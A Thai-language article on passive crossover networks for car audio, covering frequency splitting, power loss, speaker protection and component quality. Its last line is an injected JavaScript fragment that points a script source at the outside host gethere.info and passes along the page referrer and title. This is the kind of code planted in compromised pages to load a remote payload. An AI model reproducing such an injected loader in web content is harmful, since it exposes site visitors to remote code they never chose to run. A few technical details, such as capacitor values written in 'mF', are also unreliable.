ว่าด้วย…พาสซีพ ครอสโอเวอร์ เน็ตเวิร์ค
ครอสโอเวอร์ เน็ตเวิร์ค เป็นอุปกรณ์ที่อาจมีขนาดความสูงเป็น 1/2 DIN หรือขนาด Half A4 หรือขนาดอื่นๆก็ได้แล้วแต่การออกแบบ โดยจะมีสาระสำคัญอยู่ตรงเรื่องการแบ่งส่วนความถี่เสียงเพื่อการจัดระบบเสียง ในประเภทต่างๆ ไม่ว่าจะเป็นแบบ ไบ-แอมป์, ไตร-แอมป์ หรือ ควอด-แอมป์ นอกจากนี้ในบางรุ่นอาจมีคุณลักษณะของการตัดคลื่นซับโซนิค และการปรับเลื่อนเฟสเสียง, การปรับเบสแบบ โมโน/สเตอริโอ หรืออื่นๆอีกก็ได้แล้วแต่การออกแบบ
ครอสโอเวอร์ ทำอะไรได้บ้างในระบบ
- แบ่ง / ผ่าน ความถี่ให้ถูกต้อง ครอ สโอเวอร์ เน็ตเวิร์ค ถูกออกแบบมาเพื่อการจำกัดขอบเขตของความถี่เสียงที่จะถูกส่งต่อไปยังลำโพง ดังนั้นครอสโอเวอร์จึงเปรียบเสมือนว่าเป็นตำรวจจราจรครับ ที่จะคอยจัดการให้ความถี่สูงส่งผ่านไปยังลำโพงทวีตเตอร์, ให้เสียงกลางส่งผ่านไปที่ลำโพงมิดวูฟเฟอร์ และให้เสียงเบสผ่านไปยังลำโงซับวูฟเฟอร์นั่นเอง
- ลด / ป้องกัน ความผิดพลาดของลำโพง กล่าว คือ ถ้าไม่มีครอสโอเวอร์แล้ว การเดินทางของคลื่นเสียงก็เหมือนการจราจรที่ติดขัด ลำโพงมิดเร้นจ์ กับลำโพงซับวูฟเฟอร์ อาจมาการทำงานที่ซ้ำกันในย่านความถี่เดียวกันได้ แน่นอนครับตัวซับวูฟเฟอร์ในระบบก็จะพยายามส่งเสียงในย่านความถี่สูงๆที่มัน ไม่สามารถทำได้ทำให้เกิดอาการที่เรียกว่า สุมรวมอย่างรุนแรง (Fatal pile-up) ที่ จะมีการทำลายเสียงแหลมด้วยลักษณะการเปลี่ยนปัจจัยด้วยความถี่เสียงเบส ซึ่งจะทำให้ลำโพงซับวูฟเฟอร์มีอาการกระตุกต่อเนื่องในเส้นทางที่ผิดพลาด
- สร้างความเหมาะสมให้ระบบ มันเป็นความจำเป็นอย่างยิ่งที่จะต้องค้นหาครอสโอเวอร์ในรูปแบบที่เหมาะสมกับลำโพงแต่ละตัว เช่นการใช้ลำโพงแบบ 2 ทาง 1 คู่ในระบบ คุณก็ต้องใช้ครอสโอเวอร์แบบ 2 ทาง เพื่อกั้นความถี่ต่ำ กรองเอาแต่ความถี่สูงไปให้ลำโพงทวีตเตอร์ และกั้นความถี่สูงกรองความถี่ต่ำไปให้ลำโพงวูฟเฟอร์นั่นเอง…
อะไรคือ พาสซีพ ครอสโอเวอร์
พาสซีพ ครอสโอเวอร์ (Passive Crossover) จะใช้ติดตั้งขั้นระหว่างตัว เพาเวอร์แอมป์กับลำโพง แล้วโดยมากมักใช้สำหรับการแยกเสียง กลาง-แหลม ให้ออกจากกันก่อนที่จะส่งต่อไปให้ลำโพง มักจะไม่นิยมใช้สำหรับการแยกเสียงต่ำ อันที่จริงแล้วมันก็ใช้แยกได้ แต่มันจะมีการสูญเสียงกำลังไปบางส่วน
สาเหตุ ที่ พาสซีพ ครอสโอเวอร์ ยังเป็นที่ได้รับความนิยมกันอยู่อย่างต่อเนื่องจากอดีตจนถึงปัจจุบันก็คือ การผสมผสานที่ลงตัวของ แมกคานิกส์ และ อิเล็คทรอนิคส์ นั่นก็คือเมื่อมันได้รับสัญญาณเสียงจาก เพาเวอร์แอมป์ มันก็จะส่งผ่านไปยังอุปกรณ์เหนี่ยวนำอย่างขดลวด (Coil) และตัว คาพาซิสเตอร์ เพื่อทำการแยกสัญญาณเสียงกลาง และเสียงแหลม ให้ออกจากกันตามความเหมาะสมก่อนที่จะส่งต่อให้กับลำโพงที่เหมาะสมกับแต่ละ ความถี่เสียงต่อไป ถ้าปล่อยให้ลำโพงแต่ละตัวแยกความถี่เอง มันก็คงเป็นเรื่องยากที่จะได้สัญญาณที่เหมาะสมจากเพาเวอร์แอมป์ และตัวลำโพงเองก็คงจะไม่สามารถทำงานได้อย่างเต็มประสิทธิภาพ เท่าที่ควรจะเป็น
พาสซีพ ครอสโอเวอร์ มีข้อจำกัดหรือไม่
เนื่อง จากตัวของ พาสซีพ ครอสโอเวอร์ ที่มีการใช้ขดลวด หรือ คอยล์ สำหรับการเหนี่ยวนำ และ คาพาซิสเตอร์ เป็นส่วนประกอบหลัก จึงทำให้ในการแยกความถี่เสียงนั้นต้องมีการสูญเสียกำลังไปบ้างบางส่วน ซึ่งจากการคำนวณพบว่าที่จุดตัดตั้งแต่ 3 dB ขึ้น ไป ตัวของ พาสซีพ ครอสโอเวอร์ จะขโมยพลังงานกว่าครึ่งหนึ่ง แต่กับการที่เราต้องสูญเสียกำลังบางส่วนให้กับ พาสซีพ ครอสโอเวอร์ ยังพอรับได้กับการแลกมาซึ่งอรรถประโยชน์ที่เราจะได้รับ
นอกจากแยกเสียง พาสซีพ ครอสโอเวอร์ ทำอะไรได้อีกบ้าง
ถ้า เราพิจารณาจากความต้านทาน และโหลดของลำโพงส่วนใหญ่แล้ว ก็มักจะมีขีดจำกัดของมันในการรับสัญญาณ และกระแสไฟฟ้า กับตลอดเวลาที่มีการเล่นเพลง หรือดนตรีในระบบเสียง แน่นอนครับมันย่อมจะต้องเกิดการเหนี่ยวนำ และเกิดความต้านทานตลอดเวลาที่มีการแยกสัญญาณเสียงในตัว พาสซีพ ครอสโอเวอร์ ซึ่งในบางครั้งก็อาจจะมีกระแสไฟฟ้าค่อนข้างสูง หรือมีการกระชากของกระแสไฟฟ้าที่รุนแรง อันเนื่องมาจากการกระแทกกระทั้นของจังหวะเสียง และดนตรี ที่มันจะส่งผลต่อลำโพง และอาจก่อให้เกิดความเสียหายได้ โดยเฉพาะอย่างยิ่งในลำโพงประเภท ทวีตเตอร์ ที่มักจะเจอกันบ่อยๆ
โดยเฉพาะในกรณีที่มีการใช้ระดับพลังงานที่สูงมากๆ แม้ว่าโอกาสที่มันจะเกิดขึ้นมีน้อยนิด แต่มันก็มี วันดีคืนดีมันอาจจะเกิดขึ้นกับลำโพงาก็ได้ ถ้าในตอนนี้ในระบบของคุณมีการตอดตั้งเจ้า พาสซีพ ครอสโอเวอร์ เอาไว้แล้ว ปัญหาที่ว่านี้มันก็จะบรรเทาเบาบางลงไปได้มากอักโขอยู่ อันเนื่องมาจากโหลด หรือความต้านทานที่มีอยู่ในตัวของ พาสซีพ ครอสโอเวอร์ นั่นเอง
ซึ่งมันจะคอยทำหน้าที่เสมือนเป็นฝาย หรือเขื่อนกั้นน้ำ ที่จะคอยปะทะสัญญาณ และกระแสไฟฟ้าที่รุนแรงให้บรรเทาเบาบางลง ก่อนที่มันจะส่งสัญญาณเหล่านั้นให้กับลำโพง หรือในกรณีที่หนักๆ ตัวขดลวด และ คาพาซิสเตอร์ ในตัว พาสซีพ ครอสโอเวอร์ นั้น มันจะขาดในทันที เสมือนว่าเป็นการตัดสัญญาณในทันทีเหมือนกัน ก่อนที่มันจะวิ่งเข้าไปทำความเสียหายให้กับลำโพง
ยิ่ง ถ้ารู้จักเลือก ก็จะเห็นได้ว่า ใน พาสซีพ ครอสโอเวอร์ บางรุ่น บางยี่ห้อนั้น จะมีการออกแบบให้มี ฟิวส์ หรือมี รีเลย์ อยู่ในตัว สำหรับในกรณีฉุกเฉิน อันนี้ยิ่งดีใหญ่ คือถ้ามีอะไรผิดปกติ หรือมีสัญญาณ และกระแสไฟฟ้าเกินกว่าที่มัยจะรับได้ มันจะตัดการทำงานของมันทันที เป็นการป้องกันตัวของ พาสซีพ ครอสโอเวอร์เอง และป้องกันลำโพงด้วย ซึ่งทำให้เราตรวจสอบระบบได้ง่ายขึ้น
จะเลือก พาสซีพ ครอสโอเวอร์ ที่ดีได้อย่างไร
- เลือกอุปกรณ์ที่มีคุณภาพ ปัญหา สำคัญของการเลือกใช้ พาสซีพ ครอสโอเวอร์ นั้น นอกจากยี่ห้อ และการออกแบบที่ดีแล้ว เรายังจะต้องดูกันให้ลึกลงไปถึงอุปกรณ์ตางๆที่นำมาผลิตด้วย ถึงแม้ว่ามันจะตรวจสอบได้ยาก แต่ถ้ามีโอกาสเลือกเราก็ต้องฉกฉวยโอกาสนั้นด้วย โดยเฉพาะอย่างยิ่งขดลวดเหนี่ยวนำ (Coil) และ คาพาซิสเตอร์ ที่เป็นส่วนหลักสำหรับการแยกสัญญาณเสียงสูง และต่ำ โดยทางผู้ผลิตลำโพงส่วนใหญ่ต่างก็ให้คำแนะนำและสนับสนุนให้มีการใช้แกนแบบ Ferrite แทน แกนเหล็ก สำหรับอุปกรณ์เหนี่ยวนำอย่างขดลวด หรือ คอยล์ เพราะว่ามันสามารถที่จะช่วยให้การเหนี่ยวนำกระแสไฟฟ้าในขดลวด ให้เป็นไปได้อย่างมีประสิทธิภาพมากขึ้น และไม่มีการทำลายเชิงเส้นของเสียง ทำ ให้ตัว พาสซีพ ครอสโอเวอร์ มีประสิทธิภาพในการทำงานที่ดีขึ้น กล่าวคือมันจะช่วยให้ค่า แอมพลิจูด หรือช่วงกว้างของคลื่น ในความถี่เสียงต่ำ มีความกว้างเพิ่มขึ้น ทำให้เสียงที่ได้มีความต่ำและทุ้มลง และมีความนุ่มนวลมากขึ้น ตัว คาพาซิสเตอร์ ก็เช่นกัน ถ้าในตัว พาสซีพ ครอสโอเวอร์ มีการเลือกใช้ คาพาซิสเตอร์ ที่มีคุณภาพสูง มันก็มีส่วนเป็นอย่างมาก ที่จะทำให้เสียงในย่านความถี่สูง ลดความจัดจ้าน เสียดหูลงได้ และมีเสียงที่ใสสะอาดมากขึ้น และมันก็ตามมาด้วยสนนราคาที่ค่อนข้างจะสูงมากขึ้นด้วย…
- อายุการใช้งาน และความผิดพลาดของอุปกรณ์ ใน ทางกลับกัน ถ้าเราย้อนมาดูกันที่ พาสซีพ ครอสโอเวอร์ ที่ใช้กันอยู่ทั่วไป เพื่อให้ราคามันอยู่ในระดับที่พอจะควักกระเป๋ากันได้ในแบบไม่ลังเล ก็มักจะใช้ คาพาซิสเตอร์ ในแบบมีขั้ว หรือในแบบ Bipolar Electrolytic แทน ซึ่งก็ถือว่ายังสามารถใช้งานได้ดีในระดับหนึ่ง มีประสิทธิภาพในระดับกลางๆสำหรับเส้นเสียง ส่วนข้อเสียของก็คือประสิทธิภาพการทำงานจะเปลี่ยนแปลงไปตาม อุณหภูมิ และอายุการใช้งาน ที่ทำให้เกิดความผิดพลาดได้ขนาด +20% ถึง -50% เลยที่เดียว นั่นก็หมายความว่า ถ้าตัว พาสซีพ ครอสโอเวอร์ใช้ คาพาซิสเตอร์ ขนาด 10 mF แต่ในการใช้งานจริงมันอาจมีการทำงานที่เพิ่มขึ้นเป็น 12 mF หรือบางที่มันอาจจะลดลงเหลือแค่เพียง 5mF ก็เป็นได้ ซึ่งสิ่งเหล่านี้ล้วนแต่ส่งผลต่อประสิทธิภาพของเสียง และการทำงานของ พาสซีพ ครอสโอเวอร์ทั้งสิ้น
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;